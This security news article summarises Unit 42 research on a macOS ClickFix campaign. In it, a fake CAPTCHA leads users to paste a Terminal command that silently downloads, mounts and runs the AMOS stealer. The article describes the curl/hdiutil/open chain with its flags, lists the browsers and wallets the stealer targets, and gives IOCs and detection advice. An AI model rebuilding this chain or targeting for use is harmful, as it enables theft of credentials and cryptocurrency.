"A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info‑stealing malware from malicious disk image (DMG) files," researchers at Palo Alto Networks Unit 42 report.
How the ClickFix Terminal command chain operates
Palo Alto Networks Unit 42 says the campaign opens with a fake CAPTCHA page that instructs a visitor to open macOS Terminal and paste a command to “verify” themselves. If the user complies, the single command sequence performs four linked actions: it uses curl with the quiet flags "-fsSL" to download a DMG to /tmp under a randomized filename; it calls macOS's native hdiutil with "attach -nobrowse" to mount the disk image without showing it in Finder or on the desktop; it searches up to three directory levels for the first .app or .pkg installer inside the mounted volume; and it launches that installer automatically with the macOS open command.
Palo Alto observed a delivered disk image named "s.01M0td.dmg" which mounted a volume containing a self‑signed application bundle titled "NNApp.app." The researchers note the approach combines quiet DMG mounting with automatic execution, differing from earlier DMG-based ClickFix lures that relied on victims to manually open a downloaded image.
How AMOS (Atomic macOS Stealer) collects and exfiltrates data
The payload the researchers observed belongs to the Atomic macOS Stealer family — AMOS — and is built to harvest a broad set of sensitive artifacts. Unit 42 reports the stealer gathers browser credentials, authentication tokens, browser history, and stored payment cards; it targets macOS system files including Apple Keychain databases and Safari cookies; it harvests Telegram Desktop and Discord data; and it copies Apple Notes databases and user documents with PDF, TXT, or RTF extensions.
All collected material is packaged into a ZIP archive and uploaded to an attacker‑controlled server where the actor can retrieve it, Unit 42 says. The malware also displays a fake System Preferences authentication prompt to solicit the victim’s password directly, enabling the stealer to capture additional credentials.
Browsers, cryptocurrency wallets, and desktop apps targeted
Palo Alto lists the specific software AMOS looks for. On the Chromium side the malware targets eight browsers: Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex, harvesting cookies, login databases, autofill, stored cards, and profile data. For Firefox and Firefox‑derived browsers it targets LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser for the same categories of data.
The stealer also searches for cryptocurrency wallet data across numerous local wallet implementations, including Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper. Notably, Unit 42 found the malware will replace legitimate installations of Ledger Live and Trezor Suite with malicious versions — a likely tactic to enable direct crypto theft by presenting compromised wallet management software to the user.
Command‑and‑control and payload artifacts observed
Unit 42 attributes the campaign’s network activity to attacker infrastructure that included the domain svs‑verificationdate[.]beer and the IP 196.251.107[.]171. The observed DMG filename "s.01M0td.dmg" and the self‑signed application "NNApp.app" are concrete artifacts defenders can search for within telemetry, the researchers say.
Because the hdiutil call uses the -nobrowse option, the mounted volume will not appear in Finder or on the desktop, reducing obvious visual indicators that a disk image has been opened. The script’s automated search and open of the first .app or .pkg found — limited to three directory levels — is a compact and repeatable chain that can be scripted into a single copy‑and‑paste command line, which is exactly how the ClickFix social engineering lure presents it to victims.
What this means for technologists, security teams, and end users
- Technologists and security teams: Unit 42’s artifacts — the DMG name pattern, NNApp.app, the svs‑verificationdate[.]beer domain, and 196.251.107[.]171 — give concrete IOC (indicator‑of‑compromise) entries to hunt for. The quiet mount behavior (hdiutil attach -nobrowse) and automatic open warrant EDR and process‑monitoring rules that flag command chains invoking curl, hdiutil, and open in rapid succession.
- Security operations and incident responders: Palo Alto’s writeup underscores a simple detection gap — the entire attack is triggered by a pasted Terminal command. Teams should consider controls around vector telemetry for Terminal usage and automated command execution originating from browsers or unknown pages.
- End users: The researchers repeat a single basic rule: if a website tells you to open Terminal and run a command you do not 100% understand, do not run it. The ClickFix lure — fake CAPTCHAs, browser fixes, and system alerts — is the social engineering mechanism that primes victims to paste precisely that dangerous one‑liner.
Unit 42’s findings show a blended approach: the social‑engineering simplicity of ClickFix plus a technical twist that hides the disk image from casual observation. With device credentials, Keychain entries, messaging data, and cryptocurrency wallets on the line — and with the Picus whitepaper cited in the report noting that security teams log 54% of successful attacks but alert on only 14% — the campaign is a reminder that small user actions can unlock broad data access for an attacker.
